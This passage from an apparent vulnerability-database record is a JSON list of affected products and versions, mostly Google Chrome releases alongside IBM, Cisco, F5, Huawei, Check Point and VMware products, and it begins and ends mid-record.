"vendor": "google", "version": "35.0.1916.9" }, { "model": "smartcloud provisioning fixpack for sv", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1080.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.67" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.0" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "espace uc v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "physical access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "2054-e11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.4" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "secureplatform r70.50", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.951.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.55" }, { "model": "gaia r71", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.4" }, { "model": "workcentre r15-03 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7775061.090.225.06200" }, { "model": "oceanstor s2200t v100r005c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.0" }, { "model": "netflow collection agent", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.130" }, { "model": "infosphere balanced warehouse c4000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.414.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.55" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.332" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.85" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.108" }, { "model": "secure access control server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.688.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1050.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.479.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.11" }, { "model": "oceanstor s5600 v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.960.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.838.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.394.0" }, { "model": "network security sensor appliance", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "8.1" }, { "model": "oceanstor s2600 v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.718.0" }, { "model": "secureplatform r75.46", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.503.1" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "uma-db v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.890.1" }, { "model": "oceanstor s2200t v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "service control engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1057.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.20" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.528.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.30" }, { "model": "rack server rh2288e v100r002c", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1676.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.100" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.62" }, { "model": "cloud identity manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.2491064" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.84" }, { "model": "sal gw virtual app", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.25" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1023.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.325.0" }, { "model": "high-density server xh320 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.33" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.57" }, { "model": "secure access core concentrator", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.46" }, { "model": "espace vtm v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1010.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.724.0" }, { "model": "oceanstor hdp3500e v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.431.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.10" }, { "model": "configuration and orchestration manager com", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.47" }, { "model": "cloud identity manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.498.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.51" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.406.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.938.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.515.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1294.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.36" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.2.1" }, { "model": "fusionaccess v100r005c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.91275" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.445.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.409.0" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.4.0.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.68" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.4" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.315.0" }, { "model": "network convergence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.741.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.170.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.588.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.75" }, { "model": "galax8800 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1045.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.799.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.511.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.104" }, { "model": "secureplatform r77.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1073.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.152" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.792.0" }, { "model": "secureplatform r77.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "ipso r71.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "storefabric c-series mds switches", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "gaia embedded r75.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.9" }, { "model": "uma v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1667.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.21" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.1" }, { "model": "omm solution v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.322" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1279.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.169.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.272.0" }, { "model": "secureplatform r75.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.97" }, { "model": "gaia embedded ngx r65", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "associates application performance management", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.411.0" }, { "model": "oceanstor vtl6000 v100r003c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.47" }, { "model": "elog v100r003", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "secureplatform r70", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.5" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.367.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1045" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1016" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.454.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.634.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.53" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "oceanstor s5800t v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1029.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.2" }, { "model": "fusionstorage dsware v100r003c02spc100", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.337.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.54" }, { "model": "message networking sp4", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.43" }, { "model": "e9000 blade server ch222 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1032" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1302.0" }, { "model": "nexus switch for nexus series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v70004.1.(2)" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.51" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.01" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.827.0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.642.2" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2.10" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.945.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.1" }, { "model": "network performance analytics", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system storage storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4" }, { "model": "vcenter server appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.151" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1666.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.895.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.355.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.6" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "smart zero core", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "supercluster", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.21" }, { "model": "e9000 blade server ch221 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.49" }, { "model": "gaia r75", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.308.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1272.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.234" }, { "model": "galax8800 v100r002c85", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.21" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7220" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.103" }, { "model": "move antivirus agentless", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.0" }, { "model": "sdn for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "big data appliance", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.650.0" }, { "model": "gaia embedded r77", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.19" }, { "model": "vcenter support assistant", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.8" }, { "model": "oceanstor s6800t v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.338.0" }, { "model": "vcenter server appliance update", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.01" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.451.0" }, { "model": "vsphere app ha", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.135" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.59" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1301.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.29" }, { "model": "saas web protection", "scope": "eq", "trust": 0.3, "vendor": 